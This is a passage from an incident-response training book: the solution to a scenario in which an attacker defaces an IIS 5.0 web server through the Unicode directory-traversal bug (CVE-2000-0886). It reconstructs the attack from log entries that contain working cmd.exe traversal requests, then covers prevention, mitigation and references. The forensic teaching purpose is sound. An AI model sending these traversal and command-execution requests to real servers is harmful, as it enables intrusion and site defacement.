1. 1
The French Connection
by Bill Pennington, Guardent, Inc.
197
Copyright 2002 by The McGraw-Hill Companies, Inc. Click Here for Terms of Use.
2. P
uzzled from what appeared to be a lack of evidence, the I.T. staff began to re-
search Web defacement attacks and soon discovered that the Web server soft-
ware they were using, Microsoft’s IIS Web server version 5.0, had a well-known
bug that easily allowed attackers to take control of the machine. The bug the attacker
exploited, the “Web server file request parsing vulnerability” (better known as the
“Unicode Attack”), is detailed in the CVE database under #CVE-2000-0886.
This was an unsettling discovery for the I.T. staff; they realized that this server
was on the inside of the network when it was compromised. Therefore, the attacker
could now have backdoors to any number of systems inside the network, as well as
copies of sensitive data and passwords.
Once the I.T. staff knew the probable method of entry, the well-known Unicode
Web server bug, they began to piece together the attack. The bug relies on the ability
to execute a system shell, a program called cmd.exe, in order to execute commands
on the Web server. The I.T. staff found that if this bug was used, evidence of the at-
tack would be in the Web server log files. They collected all of the log files from the
Web server and imported them into a database for analysis. As cmd.exe is not a
normally occurring string in Web server log files, they performed a search for that
string and found the following:
03/03/2001 4:01 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../winnt/system32/cmd.exe /c+dir+c: 200 730 484 3
1 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
This was the first probe. If successful, the attacker would get a directory listing
of the victim computer’s C drive. This is a common, non-invasive technique em-
ployed by automated scanning programs to test whether a computer is vulnerable
to this bug, without causing any damage.
The next entry was another probe, looking at the directory listing of the D drive,
if it existed:
03/03/2001 4:01 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../winnt/system32/cmd.exe /c+dir+d: 200 747 484 3
1 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
The following 13 log file entries show the attacker retrieving various directory
listings in order to get a lay of the land, so he could be familiar with the environ-
ment. This involved retrieving more directory listings, as well as viewing the vic-
tim’s home page.
03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../winnt/system32/cmd.exe /c+dir+e: 502 381 484 4
7 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:02 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../winnt/system32/cmd.exe /c+dir+c: 200 730 484 3
198 Hacker’s Challenge: Test Your Incident Response Skills Using 20 Scenarios
4. 200 Hacker’s Challenge: Test Your Incident Response Skills Using 20 Scenarios
GET /xyzBuzz3.swf - 200 245 324 5141 www.victim.com Mozilla/4.0+(c
ompatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:03 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /index.html - 200 228 484 0 www.victim.com Mozilla/4.0+(compat
ible;+MSIE+5.0;+Windows+98) http://www.victim.com/buzzxyz.html
Once the attacker had a better understanding of the environment, the attack be-
gan. First, he renamed an auxiliary Web page to test his capabilities:
03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../winnt/system32/cmd.exe /c+rename+d:wwwrootdet
our.html+detour.html.old 502 355 522 31 www.victim.com Mozilla/4.0+
(compatible;+MSIE+5.0;+Windows+98)
Next, he created a directory, c:ArA, to set up shop; copied cmd.exe to his
work area; and renamed it cmd1.exe:
03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../winnt/system32/cmd.exe /c+md+c:ArA 502 355 48
8 31 www.victim.com Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98)
03/03/2001 4:05 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:winntsystem3
2cmd.Exe+c:ArAcmd1.exe 502 382 524 125 www.victim.com Mozilla/4.
0+(compatible;+MSIE+5.0;+Windows+98)
The preceding is the last entry for the cmd.exe search. It becomes clear that the
attacker was then using cmd1.exe to do his dirty work. A search for cmd1.exe
turned up the entries that follow.
In the first entry for the cmd1.exe search, the attacker built the Web page he
wanted to use to replace the real Web page on the server:
03/03/2001 4:07 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../ArA/cmd1.exe /c+echo+"<title>SKI</title><center
><H1><b><u>****</u>SCRIPT+KIDZ, INC<u>****</u></h1><br><h2>You,+my+
friendz+,are+completely+owned.+I'm+here,+your+security+is+nowhere.<
br>Someone+should+check+your+system+security+coz+you+sure+aren't.<b
r></h2>"+>+c:ArAdefault.htm 502 355 763 31 www.victim.com Mozilla
/4.0+(compatible;+MSIE+5.0;+Windows+98)
The attacker made a backup of the original Web site:
03/03/2001 4:08 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../ArA/cmd1.exe /c+rename+d:wwwrootindex.html+in
dex.html.old 502 355 511 16 www.victim.com Mozilla/4.0+(compatible;
+MSIE+5.0;+Windows+98)
5. Finally, the attacker copied the defaced Web site over the original Web site and
viewed his handiwork:
03/03/2001 4:10 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /scripts/../../ArA/cmd1.exe /c+copy+c:ArAdefault.htm+d:wwwr
ootindex.html 502 382 514 31 www.victim.com Mozilla/4.0+(compatibl
e;+MSIE+5.0;+Windows+98)
03/03/2001 4:11 chewie.hacker.fr W3SVC1 WWW-2K WWW-2K.victim.com 80
GET /index.html - 200 276 414 15 www.victim.com Mozilla/4.0+(compa
tible;+MSIE+5.0;+Windows+98)
As you can see from the log files, the attack from start to finish took just ten minutes.
ANSWERS
1. The attacker used the “Web server file request parsing vulnerability,” as
detailed in the CVE database under #CVE-2000-0886, to get into the Web
server.
2. The attacker made a copy of cmd.exe and renamed it to cmd1.exe,
which obfuscated the audit trail, forcing the forensic investigator to
follow a new log pattern.
PREVENTION
Prevention of this attack would have been simple if the software on the Web server
was kept up to date. The patch for the vulnerability the attacker used was released
five months prior to the penetration. The patch in this case was in the form of a
hot-fix, and at the time of this writing had not been rolled into a full-service pack.
The administrators had installed all the service packs but had failed to install the ad-
ditional hot-fixes.
Proper hardening of the Web server could also have prevented this attack. When
executing this attack, the attacker is issuing commands as the IUSR_COMPTERNAME
account. This account has no special administrative privileges on the Web server other
than the privileges given to EVERYONE. The EVERYONE group, by default, has per-
mission to execute all of the commands located in the %winnt%/system32 directory.
On most servers of this kind, administrators are the only users that need to execute
these commands from the console. Removing the rights for the EVERYONE group to
execute the commands in the %winnt%/system32 directory would have prevented
this attack, and most other attacks in the same class.
Solution 1: The French Connection 201
6. MITIGATION
To mitigate the damage caused by the penetration, the company decided to com-
pletely rebuild the Web server from scratch using the latest software available.
While not always necessary, a complete rebuild is the best way to regain strong
confidence in a machine’s software after a penetration. For continued security and
accountability, the maintenance of the machine was assigned to a single person. In
order to gain peace of mind, the company also ordered a security audit from an
outside firm to assess any possible deeper penetration of their internal infrastruc-
ture. No further damage was found. However, a few weeks later, the company
would again find themselves in need of security assistance; that story is detailed in
Challenge 2, “The Insider.”
ADDITIONAL RESOURCES
The Honeynet project had a scan of the month of February 2001 that profiled a very
similar attack:
http://project.honeynet.org/scans/scan12/
Microsoft’s security bulletin for the vulnerability, including patch information:
http://www.microsoft.com/technet/security/bulletin/ms00-086.asp
The CVE entry:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0886
202 Hacker’s Challenge: Test Your Incident Response Skills Using 20 Scenarios